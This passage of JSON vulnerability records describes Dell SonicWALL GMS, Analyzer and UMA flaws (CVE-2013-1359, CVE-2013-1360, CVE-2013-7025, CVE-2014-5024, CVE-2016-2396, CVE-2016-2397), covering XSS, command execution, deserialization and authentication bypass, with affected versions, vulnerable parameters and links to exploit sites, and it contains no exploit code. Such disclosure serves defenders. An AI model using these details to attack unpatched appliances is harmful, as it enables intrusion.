"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81367"
},
{
"trust": 1.7,
"url": "https://fortiguard.com/encyclopedia/ips/35264/multiple-sonicwall-products-authentication-bypass-vulns"
},
{
"trust": 1.7,
"url": "https://packetstormsecurity.com/files/author/7547/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-1359"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1359"
},
{
"trust": 0.1,
"url": "http://metasploit.com/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-61361"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "PACKETSTORM",
"id": "119808"
},
{
"db": "NVD",
"id": "CVE-2013-1359"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-61361"
},
{
"db": "BID",
"id": "57445"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"db": "PACKETSTORM",
"id": "119808"
},
{
"db": "NVD",
"id": "CVE-2013-1359"
},
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-11T00:00:00",
"db": "VULHUB",
"id": "VHN-61361"
},
{
"date": "2013-01-17T00:00:00",
"db": "BID",
"id": "57445"
},
{
"date": "2020-03-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"date": "2013-01-25T02:58:51",
"db": "PACKETSTORM",
"id": "119808"
},
{
"date": "2020-02-11T17:15:11.593000",
"db": "NVD",
"id": "CVE-2013-1359"
},
{
"date": "2013-01-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-14T00:00:00",
"db": "VULHUB",
"id": "VHN-61361"
},
{
"date": "2013-01-24T19:00:00",
"db": "BID",
"id": "57445"
},
{
"date": "2020-03-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007224"
},
{
"date": "2020-02-14T18:13:49.477000",
"db": "NVD",
"id": "CVE-2013-1359"
},
{
"date": "2020-05-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural SonicWALL Product authentication vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007224"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201301-377"
}
],
"trust": 0.6
}
}
cve-2016-2396
Vulnerability from cvelistv5
Published
2016-02-17 15:00
Modified
2024-08-05 23:24
Severity ?
EPSS score ?
Summary
The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1035015 | vdb-entry, x_refsource_SECTRACK | |
| http://www.zerodayinitiative.com/advisories/ZDI-16-164 | x_refsource_MISC | |
| https://support.software.dell.com/product-notification/185943 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:24:49.299Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1035015",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1035015"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-164"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.software.dell.com/product-notification/185943"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-15T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Other",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-12-20T20:52:16",
"orgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"shortName": "zdi"
},
"references": [
{
"name": "1035015",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1035015"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-164"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.software.dell.com/product-notification/185943"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "zdi-disclosures@trendmicro.com",
"ID": "CVE-2016-2396",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The GMS ViewPoint (GMSVP) web application in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote authenticated users to execute arbitrary commands via vectors related to configuration input."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Other"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1035015",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1035015"
},
{
"name": "http://www.zerodayinitiative.com/advisories/ZDI-16-164",
"refsource": "MISC",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-164"
},
{
"name": "https://support.software.dell.com/product-notification/185943",
"refsource": "CONFIRM",
"url": "https://support.software.dell.com/product-notification/185943"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2016-2396",
"datePublished": "2016-02-17T15:00:00",
"dateReserved": "2016-02-17T00:00:00",
"dateUpdated": "2024-08-05T23:24:49.299Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-7025
Vulnerability from cvelistv5
Published
2013-12-09 11:00
Modified
2024-08-06 17:53
Severity ?
EPSS score ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp.
References
| ▼ | URL | Tags |
|---|---|---|
| http://archives.neohapsis.com/archives/bugtraq/2013-12/0022.html | mailing-list, x_refsource_BUGTRAQ | |
| http://secunia.com/advisories/55923 | third-party-advisory, x_refsource_SECUNIA | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/89462 | vdb-entry, x_refsource_XF | |
| http://osvdb.org/100610 | vdb-entry, x_refsource_OSVDB | |
| http://seclists.org/fulldisclosure/2013/Dec/32 | mailing-list, x_refsource_FULLDISC | |
| http://www.securityfocus.com/bid/64103 | vdb-entry, x_refsource_BID | |
| http://www.securitytracker.com/id/1029433 | vdb-entry, x_refsource_SECTRACK | |
| http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf | x_refsource_CONFIRM | |
| http://www.exploit-db.com/exploits/30054 | exploit, x_refsource_EXPLOIT-DB | |
| http://www.vulnerability-lab.com/get_content.php?id=1099 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T17:53:45.862Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20131205 Sonicwall GMS v7.x - Filter Bypass \u0026 Persistent Vulnerability (0Day)",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0022.html"
},
{
"name": "55923",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/55923"
},
{
"name": "sonicwall-ematstaticalerttypes-xss(89462)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89462"
},
{
"name": "100610",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
"x_transferred"
],
"url": "http://osvdb.org/100610"
},
{
"name": "20131205 Sonicwall GMS v7.x - Filter Bypass \u0026 Persistent Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2013/Dec/32"
},
{
"name": "64103",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/64103"
},
{
"name": "1029433",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1029433"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf"
},
{
"name": "30054",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/30054"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.vulnerability-lab.com/get_content.php?id=1099"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-11-18T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20131205 Sonicwall GMS v7.x - Filter Bypass \u0026 Persistent Vulnerability (0Day)",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0022.html"
},
{
"name": "55923",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/55923"
},
{
"name": "sonicwall-ematstaticalerttypes-xss(89462)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89462"
},
{
"name": "100610",
"tags": [
"vdb-entry",
"x_refsource_OSVDB"
],
"url": "http://osvdb.org/100610"
},
{
"name": "20131205 Sonicwall GMS v7.x - Filter Bypass \u0026 Persistent Vulnerability",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2013/Dec/32"
},
{
"name": "64103",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/64103"
},
{
"name": "1029433",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1029433"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf"
},
{
"name": "30054",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/30054"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.vulnerability-lab.com/get_content.php?id=1099"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7025",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in ematStaticAlertTypes.jsp in the Alert Settings section in Dell SonicWALL Global Management System (GMS), Analyzer, and UMA EM5000 7.1 SP1 before Hotfix 134235 allow remote authenticated users to inject arbitrary web script or HTML via the (1) valfield_1 or (2) value_1 parameter to createNewThreshold.jsp."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20131205 Sonicwall GMS v7.x - Filter Bypass \u0026 Persistent Vulnerability (0Day)",
"refsource": "BUGTRAQ",
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-12/0022.html"
},
{
"name": "55923",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/55923"
},
{
"name": "sonicwall-ematstaticalerttypes-xss(89462)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/89462"
},
{
"name": "100610",
"refsource": "OSVDB",
"url": "http://osvdb.org/100610"
},
{
"name": "20131205 Sonicwall GMS v7.x - Filter Bypass \u0026 Persistent Vulnerability",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2013/Dec/32"
},
{
"name": "64103",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/64103"
},
{
"name": "1029433",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1029433"
},
{
"name": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf",
"refsource": "CONFIRM",
"url": "http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf"
},
{
"name": "30054",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/30054"
},
{
"name": "http://www.vulnerability-lab.com/get_content.php?id=1099",
"refsource": "MISC",
"url": "http://www.vulnerability-lab.com/get_content.php?id=1099"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7025",
"datePublished": "2013-12-09T11:00:00",
"dateReserved": "2013-12-08T00:00:00",
"dateUpdated": "2024-08-06T17:53:45.862Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-2397
Vulnerability from cvelistv5
Published
2016-02-17 15:00
Modified
2024-08-05 23:24
Severity ?
EPSS score ?
Summary
The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.zerodayinitiative.com/advisories/ZDI-16-163 | x_refsource_MISC | |
| http://www.securitytracker.com/id/1035015 | vdb-entry, x_refsource_SECTRACK | |
| https://support.software.dell.com/product-notification/185943 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T23:24:49.292Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-163"
},
{
"name": "1035015",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1035015"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.software.dell.com/product-notification/185943"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-15T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-04-19T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-163"
},
{
"name": "1035015",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id/1035015"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.software.dell.com/product-notification/185943"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-2397",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The cliserver implementation in Dell SonicWALL GMS, Analyzer, and UMA EM5000 7.2, 8.0, and 8.1 before Hotfix 168056 allows remote attackers to deserialize and execute arbitrary Java code via crafted XML data."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.zerodayinitiative.com/advisories/ZDI-16-163",
"refsource": "MISC",
"url": "http://www.zerodayinitiative.com/advisories/ZDI-16-163"
},
{
"name": "1035015",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id/1035015"
},
{
"name": "https://support.software.dell.com/product-notification/185943",
"refsource": "CONFIRM",
"url": "https://support.software.dell.com/product-notification/185943"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-2397",
"datePublished": "2016-02-17T15:00:00",
"dateReserved": "2016-02-17T00:00:00",
"dateUpdated": "2024-08-05T23:24:49.292Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2014-5024
Vulnerability from cvelistv5
Published
2014-07-24 14:00
Modified
2024-08-06 11:34
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/68829 | vdb-entry, x_refsource_BID | |
| https://support.software.dell.com/product-notification/128245 | x_refsource_CONFIRM | |
| http://seclists.org/fulldisclosure/2014/Jul/125 | mailing-list, x_refsource_FULLDISC | |
| http://secunia.com/advisories/60287 | third-party-advisory, x_refsource_SECUNIA | |
| http://packetstormsecurity.com/files/127575/SonicWALL-GMS-7.2-Build-7221.1701-Cross-Site-Scripting.html | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T11:34:37.131Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "68829",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/68829"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.software.dell.com/product-notification/128245"
},
{
"name": "20140722 Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701 (CVE-2014-5024)",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/125"
},
{
"name": "60287",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/60287"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/127575/SonicWALL-GMS-7.2-Build-7221.1701-Cross-Site-Scripting.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-07-22T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-01-04T20:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "68829",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/68829"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.software.dell.com/product-notification/128245"
},
{
"name": "20140722 Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701 (CVE-2014-5024)",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/125"
},
{
"name": "60287",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/60287"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/127575/SonicWALL-GMS-7.2-Build-7221.1701-Cross-Site-Scripting.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-5024",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in sgms/panelManager in Dell SonicWALL GMS, Analyzer, and UMA before 7.2 SP1 allows remote attackers to inject arbitrary web script or HTML via the node_id parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "68829",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/68829"
},
{
"name": "https://support.software.dell.com/product-notification/128245",
"refsource": "CONFIRM",
"url": "https://support.software.dell.com/product-notification/128245"
},
{
"name": "20140722 Reflected XSS vulnerabilities in DELL SonicWALL GMS 7.2 Build: 7221.1701 (CVE-2014-5024)",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2014/Jul/125"
},
{
"name": "60287",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/60287"
},
{
"name": "http://packetstormsecurity.com/files/127575/SonicWALL-GMS-7.2-Build-7221.1701-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/127575/SonicWALL-GMS-7.2-Build-7221.1701-Cross-Site-Scripting.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-5024",
"datePublished": "2014-07-24T14:00:00",
"dateReserved": "2014-07-22T00:00:00",
"dateUpdated": "2024-08-06T11:34:37.131Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2013-1360
Vulnerability from cvelistv5
Published
2020-02-11 15:44
Modified
2024-08-06 14:57
Severity ?
EPSS score ?
Summary
An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securitytracker.com/id/1028007 | x_refsource_MISC | |
| http://www.securityfocus.com/bid/57446 | x_refsource_MISC | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/81366 | x_refsource_MISC | |
| http://www.exploit-db.com/exploits/24203 | x_refsource_MISC | |
| http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html | x_refsource_MISC | |
| https://packetstormsecurity.com/files/cve/CVE-2013-1360 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T14:57:05.126Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/57446"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.exploit-db.com/exploits/24203"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2013-01-17T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-02-11T15:44:43",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securitytracker.com/id/1028007"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.securityfocus.com/bid/57446"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/81366"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.exploit-db.com/exploits/24203"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2013-01/0075.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://packetstormsecurity.com/files/cve/CVE-2013-1360"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-1360",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An Authentication Bypass vulnerability exists in DELL SonicWALL Global Management System (GMS) 4.1, 5.0, 5.1, 6.0, and 7.0, Analyzer 7.0, Universal Management Appliance (UMA) 5.1, 6.0, and 7.0 and ViewPoint 4.1, 5.0, and 6.0 via a crafted request to the SGMS interface, which could let a remote malicious user obtain administrative access."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
